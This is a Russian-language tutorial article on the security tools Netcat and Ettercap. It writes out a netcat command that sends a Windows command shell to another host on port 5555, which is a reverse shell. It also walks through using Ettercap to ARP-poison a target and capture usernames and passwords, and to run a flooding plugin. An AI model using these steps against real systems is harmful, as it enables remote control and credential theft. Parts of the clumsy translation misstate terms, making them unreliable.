Monday, July 24th, 2017

Специализированные инструменты (Часть 2)

Published on Январь 29, 2009 by   ·   Комментариев нет

В первой части статьи о “Специализированных инструментах” мы разобрались с сетевым сканером и анализатором пакетов, осветив их установку и использование. Во второй части статьи мы разберем еще некоторые важные инструменты. Читайте и учите!

Если Вы пропустили первую часть настоящей статьи, то читайте Специализированные инструменты (Часть 1).

В первой части настоящей статьи мы разобрали назначение таких необходимых инструментов, как анализатор пакетов и сетевой сканер, осветив процесс их установки и использования. Во второй части мы осветим еще некоторые инструменты, которые должны быть установлены на вашем компьютере в целях обеспечения соответствующей безопасности. Пожалуйста, помните, что вместе с выходом XP SP2 большинство инструментов безопасности стали непригодными. Я буду указывать на основе какой системы использую определенный инструмент и совместим ли он с XP SP2. По умолчанию можно устанавливать инструменты на XP SP1, либо — Windows 2000 Professional.

Превосходный Netcat

Инструмент netcat очень часто уподобляется “Швейцарскому ножу для TCP/IP”. Это один из лучших инструментов в своей области, который необходимо иметь каждому. Пожалуйста, загрузит его отсюда. После закачки Вам остается только выгрузить файл из архива и установить nc.exe в корень диска C, т.е.: C:\. Теперь Вы готовы к использованию Netcat! Пожалуйста, посмотрите скриншот внизу для получения большей помощи.

Ettercap

Рисунок 1

Для быстрой демонстрации возможностей запустите следующий синтаксис:

nc.exe 192.168.1.102 5555 –e cmd.exe

С помощью данного синтаксиса будет выполнен экспорт cmd.exe на другой компьютер с netcat на порту приема 5555. прекрасно! Пожалуйста, посмотрите на нижеприведенный рисунок.

Описание плагинов ettercap

Рисунок 2

Пожалуйста, запомните, что я ввел указанный выше синтаксис на одном компьютере для экспорта cmd.exe на другой компьютер с netcat на порт приема 5555, что указано на Рисунке. Это лишь одна из немногих вещей, которые может сделать для Вас netcat. Вы можете заметить в меню, что существует также большое количество других опций. Данный инструмент кроме всего прочего позволяет проводить маршрутизацию ресурса с дальностью до четырех «прыжков». Netcat конечно же не так хорош, как Nmap, но он также пригоден и для сканирования портов. Вы также можете связывать его с определенными портами для проведения подсчета. Список возможностей можно продолжить! Существует большое количество пособий, позволяющих лучше понять возможности данного инструмента. Я настоятельно рекомендую Вам исследовать его!

Игра с Ettercap

Ettercap относится к тем инструментам, которые могут делать необъятное количество вещей. В принципе, он был сконструирован для отражения MITM (человек — основной объект) атак. Основное его преимущество—способность работать в коммутируемых средах. В такой среде у вас нет возможности отследить трафик от другого сегмента, однако с использованием Ettercap Вы можете запросто это сделать с помощью нескольких способов. Итак, давайте загрузим и установим данный инструмент. Вы, наверняка, заметили, если уже использовали данный инструмент, что он выдает данный об ошибке некоторых файлов dll. Пожалуйста, проверьте здесь все настройки и исправьте их. Вы увидите, что придется переименовать libnet.dll и packet.dll в обычные libnet и packet. Сделав это, Вы можете приступать к полноценному использованию Ettercap. Пожалуйста, просмотрите нижеприведенный рисунок.

Ettercap примеры

Рисунок 3

Все, что я сделал на рисунке, это нажал на меню “Старт” и “Начать анализ”. Затем я перешел в меню “Хосты” и кликнул “Сканировать хосты”. Затем я проверил список найденных хостов в “Списке хостов”. Оттуда я добавил адрес 192.168.1.102 в целевой список. После этого Ettercap анализировал учетные записи наименований пользователей и пароли моего email. Это, в принципе, наименее значительная часть работы Ettercap. Замечательно, что после проведения анализа Вы можете кликнуть “Вид”, а затем “Профайлы”. Вы увидите список адресов IP; для получения более детальной информации о каждом из них Вам нужно лишь щелкнуть на нем дважды мышкой (информация включает адрес MAC, расстояние от Вас, возможная операционная система и т.д.). Также здесь будут перечислены все имена пользователей и пароли.

Основное тело Ettercap можно найти в меню “Плагинов”. Здесь вы найдете огромное количество плагинов, которые могут быть использованы в работе. К примеру, попробуйте плагин “rand_flood”. Для его активации просто щелкните на нем дважды мышкой (равно, как и для его деактивации). Перед этим, однако, следует запустить анализатор пакетов, описание которого я дал в первой части настоящей статьи. Это позволит Вам увидеть, каким образом Ettercap проводит наполнение ARP. Тем, кто не знает, как, лучше посмотреть на приведенный рисунок.

Ettercap примеры

Рисунок 4

Вы можете видеть, что остается много мусора, сгенерированного Ettercap. Вы также можете увидеть “arp who-has 192.168.1.106 tell 192.168.1.1”. Это, всего лишь один из множества плагинов, которые можно найти в меню “Плагинов”. Запомните, что лучше использовать сначала анализатор пакетов, чтобы просмотреть последствия работы. Еще одна группа плагинов, которой следует уделить особое внимание, это плагины типа SMB. Во внутренней сети информация, собранная с помощью протокола SMB, может быть объектом хакерской атаки. Ettercap может послужить хорошему специалисту в обеспечении соответствующей защиты от этого; однако, этот же инструмент может быть использован и хакерами.

В то время, как он может Вам показаться только в виде инструмента GUI, он может быть проконтролирован также через командную строку DOS. Я говорю об этом так просто, потому что данный инструмент может быть установлен и использоваться удаленно (т.е., служить объектом не только локальной атаки).

Итак, мы изучили инструменты Netcat и Ettercap. Два очень серьезных инструмента хакеров. Ettercap может заставить Вас потратить определенное количество времени для его изучения. Лучше же всего, если вы испробуете оба указанных инструмента в интегрированной среде для выяснения всех их преимуществ.

На этой ноте я завершу вторую часть статьи. В третьей последней части мы рассмотрим еще два инструмента: Nemesis (усилитель пакетов) и SPIKE модуль доступа к HTTP. Изучения модуля доступа к HTTP не только углубит Ваши познания в соответствующей области, но и также в сфере обеспечения безопасности приложений. Мы установим оба инструмента и рассмотрим их назначение. Итак, до следующего раза!

Источник www.windowsecurity.com


Смотрите также:

Tags: , ,

Readers Comments (Комментариев нет)




Да человек я, человек! =)

Exchange 2007

Проведение мониторинга Exchange 2007 с помощью диспетчера System Center Operations Manager 2007 (часть 3)

Если вы хотите прочитать предыдущие части этой серии статей, перейдите по ссылкам: Проведение мониторинга Exchange 2007 с помощью диспетчера System ... [+]

Практическое рассмотрение перехода с Exchange 2003 на Exchange 2007 (часть 1)

Введение В этой статье из нескольких частей я хочу показать вам процесс, который недавно использовал для перехода с существующей среды Exchange 2003 ... [+]

Использование инструмента Exchange Server Remote Connectivity Analyzer Tool (часть 2)

Если вы пропустили первую часть этой серии, пожалуйста, прочтите ее по ссылке Использование инструмента Exchange Server Remote Connectivity Analyzer Tool (Часть ... [+]

Мониторинг Exchange 2007 с помощью диспетчера System Center Operations Manager 2007 (часть 2)

Если вы пропустили предыдущую часть этой серии статей, перейдите по ссылке Мониторинг Exchange 2007 с помощью диспетчера System Center Operations ... [+]

Подробное рассмотрение подготовки Active Directory для Exchange 2007 (часть 5)

Если вы пропустили предыдущие части этой серии статей, перейдите по ссылкам: Подробное рассмотрение подготовки Active Directory для Exchange 2007 (часть 1) ... [+]

Установка и настройка Exchange 2007 из командной строки (Часть 3)

If you missed the previous parts in this article series please read: Exchange 2007 Install and Configuration from the command line (Part ... [+]

Использование инструмента Exchange Server Remote Connectivity Analyzer Tool (часть 1)

Инструмент ExRCA Текущий выпуск инструмента предоставляется только в целях тестирования и оснащен 5 опциями: Тест подключения Outlook 2007 Autodiscover Тест подключения Outlook 2003 RPC ... [+]

Развертывание сервера Exchange 2007 Edge Transport (часть 5)

Если вы хотите прочитать предыдущие части этой серии статей, перейдите по ссылкам: Развертывание сервера Exchange 2007 Edge Transport (часть 1) Развертывание ... [+]

Установка и настройка Exchange 2007 из командной строки (часть 2)

Если вы пропустили первую статью данного цикла, пожалуйста, перейдите по ссылке: Exchange 2007 Install and Configuration from the command line (Part ... [+]

Использование интегрированных сценариев Using Exchange Server 2007 – часть 2: генерирование отчетов агента Transport AntiSpam Agent

Если вы пропустили предыдущую часть этой серии статей, перейдите по ссылке Использование интегрированных сценариев Using Exchange Server 2007 – часть ... [+]